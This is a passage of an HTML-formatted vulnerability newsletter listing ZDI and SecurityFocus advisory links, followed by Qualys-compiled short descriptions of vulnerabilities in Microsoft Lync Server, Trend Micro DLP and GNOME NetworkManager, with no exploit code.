style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-196&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-197"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-197&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-198"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-198&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;SecurityFocus BugTraq IDs&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/47834"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/47834&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48157"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48157&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48158"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48158&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48159"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48159&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48160"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48160&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48161"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48161&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48162"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48162&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48163"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48163&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48164"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48164&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48173"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48173&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48174"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48174&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48175"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48175&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48179"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48179&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48180"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48180&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48181"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48181&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48183"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48183&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48184"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48184&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48185"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48185&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48187"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48187&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48196"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48196&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48199"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48199&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48200"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48200&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48201"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48201&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48202"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48202&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48203"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48203&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48204"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48204&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48205"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48205&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48206"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48206&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48207"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48207&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48208"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48208&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48210"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48210&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48211"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48211&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48212"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48212&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;*************************************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (&lt;/span&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;This list is compiled by Qualys ( &lt;/span&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt; ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 11428 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;______________________________________________________________________&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.1 CVE: Not Available&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Platform: Other Microsoft Products&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Title: Microsoft Lync Server 2010 "ReachJoin.aspx" Remote Command Injection&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Description: Microsoft Lync Server 2010 is a unified communication server. The application is exposed to a command injection issue because it fails to adequately sanitize user-supplied input submitted to the "reachLocale" parameter of the "ReachJoin.aspx" script.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable and other versions may also be affected.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Ref: &lt;/span&gt;&lt;a href="http://www.securityfocus.com/bid/48235/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48235/discuss&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;______________________________________________________________________&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.2 CVE: Not Available&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Platform: Third Party Windows Apps&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Title: Trend Micro Data Loss Prevention Directory Traversal&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Description: Trend Micro Data Loss Prevention is a data management and loss prevention application. The application is exposed to a directory traversal issue because it fails to sufficiently sanitize user-supplied input. Trend Micro Data Loss Prevention 5.5 is vulnerable and other versions may also be affected.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Ref: &lt;/span&gt;&lt;a href="http://www.securityfocus.com/bid/48225/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48225/discuss&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;______________________________________________________________________&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.3 CVE: CVE-2011-1943&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Platform: Linux&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Title: GNOME NetworkManager "/var/log/messages" Information Disclosure&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPla
